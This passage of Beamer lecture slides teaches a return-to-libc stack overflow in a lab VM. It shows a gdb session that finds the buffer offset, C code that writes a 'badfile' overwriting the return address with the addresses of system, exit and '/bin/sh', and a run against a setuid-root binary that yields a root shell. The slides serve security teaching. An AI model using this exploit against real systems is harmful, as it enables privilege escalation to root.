	movl %eax, -4(%ebp)
	
	leave
	ret
	
stuff:
	pushl %ebp
	movl %esp, ebp
	subl $20, %esp
	
	movl $42, -4(%ebp)
	movl -4(%ebp), %eax
	movl %eax, (%esp)
	
	call foo
	
	leave
	ret
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{It is time}
\begin{itemize}[<+->]
\item We know where to put \lstinline|"/bin/sh"| on the stack
\item We will overflow the return address of \texttt{copy\_stuff} with the address of \texttt{system}
\item Between the point when the return address is modified and the point where the argument of \texttt{system} is used, the program will execute the prologues of both \texttt{copy\_stuff} and \texttt{system}
\item By tracing these instructions, we will know where \texttt{rbp} points
\item We will proceed as before: with \texttt{gdb}
\item Note that it is important to trace \texttt{rsp}, and not \texttt{rbp}
	\begin{itemize}
	\item We don't care where it points at that moment
	\item Because \texttt{rbp} will be replaced by \texttt{rsp}
	\end{itemize}
\item When \texttt{system} is executed, the function prologue is executed
	\begin{itemize}
	\item Moves \texttt{rsp} $8$ bytes below, and sets \texttt{rbp} to the current value of \texttt{rsp}
	\end{itemize}
\item It is wiser to overflow the return address of \texttt{system} with the address of \texttt{exit}
	\begin{itemize}
	\item Arbitrary values will likely cause a crash
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\scalebox{.7}{
\begin{tikzpicture}[yscale=.4,scale=.85]
\draw[dotted] (0,0) -- (16,0);
\draw[dotted] (0,9.5) -- (16,9.5);

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,8.75) {\texttt{main}'s ebp};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,10.25) {Return address};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,11.75) {\texttt{str}};

\draw[->] (-0.1,8) -- (-0.5,8) node[left] {\texttt{ebp}};
\draw[->] (-0.1,0) -- (-0.5,0) node[left] {\texttt{buffer}};

\draw (0,0) -- (4,0);
\draw (0,8) -- (4,8);
\draw (0,9.5) -- (4,9.5);
\draw (0,11) -- (4,11);
\draw (0,12.5) -- (4,12.5);

\draw (0,0) -- (0,14);
\draw (4,0) -- (4,14);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,14) -- (0,15);
\draw[dashed] (4,14) -- (4,15);

\node at (2,-2) {Inside \texttt{copy\_stuff}};

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\begin{scope}[xshift=6cm]

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,10.25) {Addr. of \texttt{system}};

\draw[->] (-0.1,11) -- (-0.5,11) node[left] {\texttt{esp}};

\draw (0,0) -- (4,0);
%\draw (0,8) -- (4,8);
\draw (0,9.5) -- (4,9.5);
\draw (0,11) -- (4,11);
\draw (0,12.5) -- (4,12.5);

\draw (0,0) -- (0,14);
\draw (4,0) -- (4,14);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,14) -- (0,15);
\draw[dashed] (4,14) -- (4,15);

\node[text width=4cm, text centered] at (2,-2) {After hitting \texttt{ret} inside \texttt{copy\_stuff}};

\end{scope}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\begin{scope}[xshift=12cm]
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,10.25) {Addr. of \texttt{system}};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,11.75) {Return of \texttt{system}};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,13.25) {Argmt. of \texttt{system}};

\draw[->] (-0.1,9.5) -- (-0.5,9.5) node[left] {\texttt{ebp}};
\draw[->] (-0.1,4) -- (-0.5,4) node[left] {\texttt{esp}};

\draw [decorate,decoration={brace,amplitude=10pt,mirror}] (4.1,0) -- (4.1,9.5) node [black,midway,xshift=0.6cm] {$\Delta$};

\draw (0,0) -- (4,0);
%\draw (0,8) -- (4,8);
\draw (0,9.5) -- (4,9.5);
\draw (0,11) -- (4,11);
\draw (0,12.5) -- (4,12.5);
\draw (0,14) -- (4,14);

\draw (0,0) -- (0,14);
\draw (4,0) -- (4,14);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,14) -- (0,15);
\draw[dashed] (4,14) -- (4,15);

\node at (2,-2) {Inside \texttt{system}};

\end{scope}
\end{tikzpicture}}
\end{frame}

\begin{frame}
\frametitle{Building \texttt{badfile}}
\begin{itemize}[<+->]
\item We \emph{could} write another shell code
\item Here : it is not needed
	\begin{itemize}
	\item We only need to write three addresses
	\item We are not executing code
	\end{itemize}
\item We need to know 
	\begin{itemize}
	\item the value of \texttt{ebp} while executing \texttt{copy\_stuff}
	\item the offset $\Delta$ from the beginning of the buffer
	\end{itemize}
\item Again, we will use \texttt{gdb}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Sniffing our way around}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -fno-stack-protector -g -o overflog overflow.c
ssd@ssd-vb:~$ touch badfile
ssd@ssd-vb:~$ gdb overflog
(gdb) b copy_suff
Breakpoint 1 at 0x80484bd: file overflow.c, line 10
(gdb) run
Starting program ...
breakpoint 1, copy_stuff (str=xxx 0xbffff16c )  at overflow.c
(gdb) p &buffer
$1 = (char (*)[100]) 0xbffff0dc
(gdb) p $ebp
$2 = (void*) 0xbffff148
(gdb) p 0xbffff148 - 0xbffff0dc
$3 = 108
(gdb) quit
\end{lstlisting}
\begin{itemize}
\item The offset of the address of \texttt{system} is $108 + 4 = 112$
\item The offset of the return address of \texttt{system} is $108 + 8 = 116$
\item The offset of \lstinline|"/bin/sh"| of is $108 + 12 = 120$
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Our malicious code}
\begin{itemize}
\item File \texttt{malicious-libc.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
	char buffer[200];	
	
	memset(buffer, 0xaa, 200); //fill with non zeros
	
	*(long *) &buffer[120] = 0xbffffe83; //address of "/bin/sh"
	*(long *) &buffer[116] = 0xb75a4fe0; //address of exit
	*(long *) &buffer[112] = 0xb75b1460; //address of system
	
	FILE * badfile = fopen("./badfile", "w");
	fwrite(buffer, sizeof(buffer), 1, badfile);
	fclose(badfile)
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Launching the attack}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -o malicious-libc malicious-libc.c
ssd@ssd-vb:~$ gcc -fno-stack-protector -o overflow overflow.c
ssd@ssd-vb:~$ sudo chown root overflow
ssd@ssd-vb:~$ sudo chmod 4755 overflow
ssd@ssd-vb:~$ ./malicious-libc
ssd@ssd-vb:~$ ./overflow
#
# id
uid=0(root) gid=1000(ssd) groups=0(root), ...
\end{lstlisting}
\end{frame}

%\begin{frame}
%\frametitle{Homework time !}
%\begin{itemize}[<+->]
%\item You are given several binaries
%\item You do not have the source code
%\item You are inputting strings, not files
%\item You have to exploit buffer overflow to
%	\begin{itemize}
%	\item find secrets
%	\item log as root
%	\end{itemize}
%\item You have the fall break and next week to do it
%\item Submit a PDF report by email
%\item The deadline is on November 10 at 23h59
%	\begin{itemize}
%	\item Gmail server time
%	\end{itemize}
%\end{itemize}
%\end{frame}

\end{document}
